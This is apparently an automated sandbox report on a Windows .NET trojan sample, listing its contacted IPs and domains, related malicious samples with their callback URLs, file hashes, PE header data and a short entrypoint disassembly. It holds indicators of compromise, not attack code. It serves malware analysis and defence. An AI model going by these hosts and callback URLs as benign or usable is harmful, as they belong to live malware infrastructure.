                                                http://www.fontbureau.comV5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.galapagosdesign.com/V5cfxBHd71.exe, 00000000.00000003.245350985.00000000062A9000.00000004.00000001.sdmp, V5cfxBHd71.exe, 00000000.00000003.246243890.000000000627E000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.jiyu-kobo.co.jp/help5V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers/cabarga.htmluV5cfxBHd71.exe, 00000000.00000003.243233476.000000000627C000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://www.fontbureau.comcomdV5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.comdyV5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.fontbureau.coV5cfxBHd71.exe, 00000000.00000003.242605012.00000000062A9000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.jiyu-kobo.co.jp/CV5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.galapagosdesign.com/staff/dennis.htmoV5cfxBHd71.exe, 00000000.00000003.245760419.000000000628A000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.fontbureau.comueTFCV5cfxBHd71.exe, 00000000.00000003.243233476.000000000627C000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.jiyu-kobo.co.jp/jp/V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.comdV5cfxBHd71.exe, 00000000.00000003.243718619.000000000627E000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.urwpp.debIV5cfxBHd71.exe, 00000000.00000003.243718619.000000000627E000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.carterandcone.comlV5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.founder.com.cn/cn/V5cfxBHd71.exe, 00000000.00000003.236344657.00000000062AF000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.jiyu-kobo.co.jp/yV5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/cabarga.htmlNV5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.founder.com.cn/cnV5cfxBHd71.exe, 00000000.00000003.235839455.00000000062AA000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers/frere-jones.htmlV5cfxBHd71.exe, 00000000.00000003.242570041.00000000062A9000.00000004.00000001.sdmp, V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.fontbureau.com/designers/cabarga.htmlV5cfxBHd71.exe, 00000000.00000003.243233476.000000000627C000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.fontbureau.com.TTF5V5cfxBHd71.exe, 00000000.00000003.243718619.000000000627E000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers$V5cfxBHd71.exe, 00000000.00000003.242288324.00000000062A9000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://www.fontbureau.commV5cfxBHd71.exe, 00000000.00000003.256705491.0000000006270000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.jiyu-kobo.co.jp/V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers#V5cfxBHd71.exe, 00000000.00000003.243369085.00000000062A9000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://www.fontbureau.comalsFCV5cfxBHd71.exe, 00000000.00000003.243584347.000000000627F000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.fontbureau.com/designers8V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.fontbureau.comalsV5cfxBHd71.exe, 00000000.00000003.243501826.000000000627F000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.jiyu-kobo.co.jp/fV5cfxBHd71.exe, 00000000.00000003.238699786.000000000627D000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.jiyu-kobo.co.jp/nlyV5cfxBHd71.exe, 00000000.00000003.238699786.000000000627D000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.fontbureau.com/designers:V5cfxBHd71.exe, 00000000.00000003.242354981.00000000062A9000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://www.jiyu-kobo.co.jp/dV5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.fontbureau.com/designers/V5cfxBHd71.exe, 00000000.00000003.241133154.00000000062AC000.00000004.00000001.sdmp, V5cfxBHd71.exe, 00000000.00000003.240999247.00000000062A9000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://www.jiyu-kobo.co.jp/tionV5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown

                                                                    Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    198.54.117.218
                                                                    parkingpage.namecheap.comUnited States
                                                                    22612NAMECHEAP-NETUSfalse
                                                                    34.102.136.180
                                                                    3cheer.comUnited States
                                                                    15169GOOGLEUSfalse
                                                                    198.54.126.105
                                                                    vectoroutlines.comUnited States
                                                                    22612NAMECHEAP-NETUStrue

                                                                    General Information

                                                                    Joe Sandbox Version:33.0.0 White Diamond
                                                                    Analysis ID:458773
                                                                    Start date:03.08.2021
                                                                    Start time:18:23:43
                                                                    Joe Sandbox Product:CloudBasic
                                                                    Overall analysis duration:0h 12m 8s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:light
                                                                    Sample file name:V5cfxBHd71.exe
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                    Number of analysed new started processes analysed:28
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • HDC enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.evad.winEXE@8/1@9/3
                                                                    EGA Information:Failed
                                                                    HDC Information:
                                                                    • Successful, ratio: 27.2% (good quality ratio 23.3%)
                                                                    • Quality average: 69.2%
                                                                    • Quality standard deviation: 34.6%
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 0
                                                                    • Number of non-executed functions: 0
                                                                    Cookbook Comments:
                                                                    • Adjust boot time
                                                                    • Enable AMSI
                                                                    • Found application associated with file extension: .exe
                                                                    Warnings:
                                                                    Show All
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 20.82.210.154, 52.255.188.83, 131.253.33.200, 13.107.22.200, 13.88.21.125, 23.211.6.115, 23.211.4.86, 20.50.102.62, 173.222.108.226, 173.222.108.210, 40.112.88.60, 80.67.82.211, 80.67.82.235
                                                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    18:24:46API Interceptor1x Sleep call for process: V5cfxBHd71.exe modified

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    198.54.117.218TNT Shipping doc.exeGet hashmaliciousBrowse
                                                                    • www.zawajalgos.com/m8uk/?XV=MTy09FK0DZb&xJB4=nPIao3MtkZZfKB1sMK+jBa6jiFKBTthlCTc/qxHBcyQb4+aqEw0YlfO52cL0KqdOdHaJ
                                                                    Dimensions and sizes for valves quotation.exeGet hashmaliciousBrowse
                                                                    • www.ukuleleintensive.com/gbwy/?k6Ad=hPDdBc6xjVVVKqTpS12Zj2KWY/xbJiOaJ1g8o8RJGjNB7GfntMGyz7zUvwO+2i9W7Ket&Vv_d=PrNDGXc
                                                                    PI for the order 20210407DTR001.pdf.gz.exeGet hashmaliciousBrowse
                                                                    • www.synth.pizza/3b4e/?QBZxT=7nopdd9xcT&a8q=1PeMpVR0bS4CVM3zcs5suMbyrMp2Y/RA6dgrMfA7ZoqktSfsEthxMaqEH9TPZZD2gzi2JG1zGQ==
                                                                    242jQP4mQP.exeGet hashmaliciousBrowse
                                                                    • www.galvinsky.digital/dy8g/?S8tT3n=K+H2wjnk8RqujiMAF6k6lUq9+zoJ+xpADfX0uiRvrYfx+zwl829klMm2N7W/QIPtbcnmYyz+UQ==&8p=SN6XYPXXpfCx
                                                                    eTWZtFRRMJ.exeGet hashmaliciousBrowse
                                                                    • www.boogerstv.com/p2io/?X48P0=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxb9s6RBL4M&NJ=6lvHNFHx
                                                                    ekeson and sons.exeGet hashmaliciousBrowse
                                                                    • www.activedevon.xyz/eo5u/?3flLi=3fixF&WDH4Z=gO4K5mHcn2QPYGRvxafNe+5p9r0cfSpdBn55FnpuS2mPyHUUFTjtXKJi1XneNJcm9Y4m6sLWag==
                                                                    Payment receipt MT103.exeGet hashmaliciousBrowse
                                                                    • www.blockchain-365.com/n86i/?3fDpH=scV3eC5LnrxmdTaZDMUbfdarjWOrUl17K3tFUIp30YFf7UyQTMB90CuHfsBJQ1LJ+yqs&Vjo=1bT0vz7
                                                                    cy.exeGet hashmaliciousBrowse
                                                                    • www.fundheros.com/zrmt/?6lux=9Kp3w7DCYJwNU8WsE17OQw23x7mujlthWWaTZWOKl7Ig6Bz27x2cp62T+P49v/mmqthg&Klh8a=p2JDfHUh1
                                                                    j5rXLljONk.exeGet hashmaliciousBrowse
                                                                    • www.g-cleanpartners.in/dlc/distribution.php?pub=mixinte
                                                                    Ohki Blower Skid Base Enquiry 052521.exeGet hashmaliciousBrowse
                                                                    • www.locply.com/un8c/?5j9=NGTfkvtaSdon4EkoI3ozpRr9bmxMgy9gsF1pztjoLp+4u8wBsb/6oXmWjnwO4OIYUp5f&vR=Ltxx
                                                                    New order 301534.pdf.exeGet hashmaliciousBrowse
                                                                    • www.yamagym.com/sbqi/?ZjR=A9FpVWg2dAPyDanCbkAal5xn8XynSE6PITFa1NeTTcon3r6OOg1WhLKe7RzZoujgxIl9KDseIA==&ndnddT=ot9xbpDpf8H4
                                                                    Ciikfddtznhxmtqufdujkifxwmwhrfjkcl_Signed_.exeGet hashmaliciousBrowse
                                                                    • www.f3g.fund/qd8i/?Qp=iKdGhUQd0gzURvlm3Jt41em8p9uaSRabaJyAAib1YADWOisPkV2HIhSGGZPUNHkrRq2K&xPWH_=LVz4vpXpDf7DLZ
                                                                    Wire Payment Of $35,276.70.exeGet hashmaliciousBrowse
                                                                    • www.locply.com/un8c/?q48=GbqltxjpVhB0It&Bzu=NGTfkvtaSdon4EkoI3ozpRr9bmxMgy9gsF1pztjoLp+4u8wBsb/6oXmWjn8OreEbN55J1SAp8g==
                                                                    4LkSpeVqKR.exeGet hashmaliciousBrowse
                                                                    • www.chalance.design/uoe8/?V2=LhqpTfJ8&rDHpw=fYbYSxt3Qhcb551a7rNTvuoixibj8olf9Mxoep0JAE6bsM5dZYso9WmxDlWOvfueGt5G
                                                                    d801e424_by_Libranalysis.docxGet hashmaliciousBrowse
                                                                    • www.playx.finance/qjnt/?BZz=llM0X6&h48x=1Vbp9If7QMpbnqc0ueS3EHoyDdmNKH7SkWmwpG2wK8nHe9QxMxQiDr/Rv9rAbZu592D3MQ==
                                                                    z5Wqivscwd.exeGet hashmaliciousBrowse
                                                                    • www.rascontractingllc.com/f0sg/?EzrtFB=4hL05l3xNH1L&9rQPJl=VL61RGYCRIinPGEMi+ZAGnHYp8XZVvRzeWAN7Ibk9LNon96r6atV/Ask5zouKtgOTJp7
                                                                    AL-IEDAHINV.No09876543.exeGet hashmaliciousBrowse
                                                                    • www.sandybottomsflipflops.com/uv34/?gjKTUx=6lchmDL0&rnKTobm=/y2QUNCyd1bGxdPjEN+TG3wvArtE+ieT5j9LKQh68qSP5982epgdoI7eXG9G+2GrVPAT
                                                                    24032130395451.pdf .exeGet hashmaliciousBrowse
                                                                    • www.partum.life/uabu/?ojqD-Z=KdrhxNh8&9r4Hc=Z0zf2dbKX6YlEzcI0VbwASPt08RzMP75iVffTsKn6GzwBBbR2IjFiCH6cCoBJQjqXWja
                                                                    Ac5RA9R99F.exeGet hashmaliciousBrowse
                                                                    • www.abundancewithmelissaharvey.com/evpn/?CZa4=UnLa0x8cdATkkSAlrLSX44s3EHgIYFf2NLcg8KhuRo/6FK7nrIMQsSkng9ZA6ahsodQ1&CPWhW=C8eHk
                                                                    SA-NQAW12n-NC9W03-pdf.exeGet hashmaliciousBrowse
                                                                    • www.switcheo.finance/uwec/?GFQl9jnp=3cOH6CffnF8zA2vO0DHvKlrvSwO+w2vUbH/s+qgAJjYXXQ/ohIL0shsdTQ14Zv3dTuQV&Rl4=YVFTx4yh

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    www.hazard-protection.comZQGMiyaTir.exeGet hashmaliciousBrowse
                                                                    • 148.59.128.71
                                                                    eHTLcWfhgv.exeGet hashmaliciousBrowse
                                                                    • 148.59.128.71
                                                                    UOMp9cDcqZ.exeGet hashmaliciousBrowse
                                                                    • 148.59.128.71
                                                                    qXDtb88hht.exeGet hashmaliciousBrowse
                                                                    • 148.59.128.71
                                                                    17jLieeOPx.exeGet hashmaliciousBrowse
                                                                    • 148.59.128.71
                                                                    KWX1rM9GB0.exeGet hashmaliciousBrowse
                                                                    • 148.59.128.71
                                                                    Contract MAY2021.xlsxGet hashmaliciousBrowse
                                                                    • 148.59.128.71
                                                                    k7AgZOwF4S.exeGet hashmaliciousBrowse
                                                                    • 148.59.128.71
                                                                    o52k2obPCG.exeGet hashmaliciousBrowse
                                                                    • 148.59.128.71
                                                                    uNttFPI36y.exeGet hashmaliciousBrowse
                                                                    • 148.59.128.71
                                                                    1ucvVfbHnD.exeGet hashmaliciousBrowse
                                                                    • 148.59.128.71
                                                                    pumYguna1i.exeGet hashmaliciousBrowse
                                                                    • 148.59.128.71
                                                                    DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                                                    • 148.59.128.71
                                                                    g0g865fQ2S.exeGet hashmaliciousBrowse
                                                                    • 148.59.128.71
                                                                    mar2403.xlsxGet hashmaliciousBrowse
                                                                    • 148.59.128.71
                                                                    parkingpage.namecheap.comINV NO-1820000514 USD 270,294.pdf.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.216
                                                                    Payment For Invoice 321-1005703.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.212
                                                                    Medical Equipment Order 2021.PDF.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.210
                                                                    YfDl.dllGet hashmaliciousBrowse
                                                                    • 198.54.117.210
                                                                    d9UdQnXQ86ld31G.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.212
                                                                    k0INCz463k.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.210
                                                                    PO-829ARTS-PI 2021-7-17.xlsxGet hashmaliciousBrowse
                                                                    • 198.54.117.211
                                                                    Inv_7623980.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.215
                                                                    direction.dllGet hashmaliciousBrowse
                                                                    • 198.54.117.218
                                                                    Purchase Order.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.215
                                                                    PYY74882220#.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.215
                                                                    cZj7V8FfFk.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.218
                                                                    Order Signed PEARLTECH contract and PO.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.210
                                                                    Payment_invoice.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.212
                                                                    INVOICE.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.211
                                                                    Order.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.215
                                                                    SMdWrQW0nH.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.218
                                                                    4326_PDF.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.216
                                                                    LPY15536W4.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.211
                                                                    u5xgJUljfI.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.210

                                                                    ASN

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    NAMECHEAP-NETUSINV NO-1820000514 USD 270,294.pdf.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.216
                                                                    scan_2021_567812097854317907854.exeGet hashmaliciousBrowse
                                                                    • 199.188.201.82
                                                                    SGKCM20217566748_Federighi Turkiye Oferta Term#U00e9k .exeGet hashmaliciousBrowse
                                                                    • 192.64.119.222
                                                                    bYrKwcFL8m.exeGet hashmaliciousBrowse
                                                                    • 198.54.122.60
                                                                    Our Company Account Details-08-2021.xlsxGet hashmaliciousBrowse
                                                                    • 198.54.122.60
                                                                    Payment For Invoice 321-1005703.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.212
                                                                    Medical Equipment Order 2021.PDF.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.216
                                                                    YfDl.dllGet hashmaliciousBrowse
                                                                    • 162.255.119.73
                                                                    sstein@cptech.com_94994965Application.HTMGet hashmaliciousBrowse
                                                                    • 162.213.253.39
                                                                    d9UdQnXQ86ld31G.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.212
                                                                    Vt03edQseah3iHM.exeGet hashmaliciousBrowse
                                                                    • 68.65.123.125
                                                                    INVOICE & PACKING LIST FOR SEA SHIPMENT.EXEGet hashmaliciousBrowse
                                                                    • 199.188.200.123
                                                                    MIN56KgzBN.exeGet hashmaliciousBrowse
                                                                    • 63.250.33.126
                                                                    xA8Yyl9vEB.exeGet hashmaliciousBrowse
                                                                    • 198.54.122.60
                                                                    xVg4so8mq9.exeGet hashmaliciousBrowse
                                                                    • 198.54.122.60
                                                                    REVISED PO 26663S.docGet hashmaliciousBrowse
                                                                    • 198.54.122.60
                                                                    order PT Macropharma.pdf.docGet hashmaliciousBrowse
                                                                    • 198.54.122.60
                                                                    Purchase Order No. PHS-01521-22..docGet hashmaliciousBrowse
                                                                    • 198.54.122.60
                                                                    Blackcatjsc inquiry.docGet hashmaliciousBrowse
                                                                    • 198.54.122.60
                                                                    1M3InhCdS7.exeGet hashmaliciousBrowse
                                                                    • 198.54.122.60

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\V5cfxBHd71.exe.log
                                                                    Process:C:\Users\user\Desktop\V5cfxBHd71.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1314
                                                                    Entropy (8bit):5.350128552078965
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                    MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                    SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                    SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                    SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                    Malicious:true
                                                                    Reputation:unknown
                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.395625597721572
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    File name:V5cfxBHd71.exe
                                                                    File size:793600
                                                                    MD5:182170393a1acd19744575f00562384f
                                                                    SHA1:e2b2d6405b359d78ba965b54e9cc6b38e223fd97
                                                                    SHA256:71ec0c91aeec5071da283d23bceb39800e9ad6c133bb6aef99d1302f47a4ada3
                                                                    SHA512:92e122d0edf30c0ad285b79e344795b90682a6ad4d8a9b6fd6003d4c2bfcaed8b2ce599caed8b55e1fdb6a2474f22236661a1780063521eea4d084afeb522f3a
                                                                    SSDEEP:12288:Eo4rGVHDwXyWU6/RRtaD8xI5eFYECvT+5wMpTxcujI80v42iN:EobBitaII5eFYkm6TxcujZx1
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....M................P..............1... ...@....@.. ....................................@................................

                                                                    File Icon

                                                                    Icon Hash:00828e8e8686b000

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x4c31f2
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                    Time Stamp:0xF0944DD6 [Mon Nov 25 20:51:34 2097 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:v4.0.30319
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
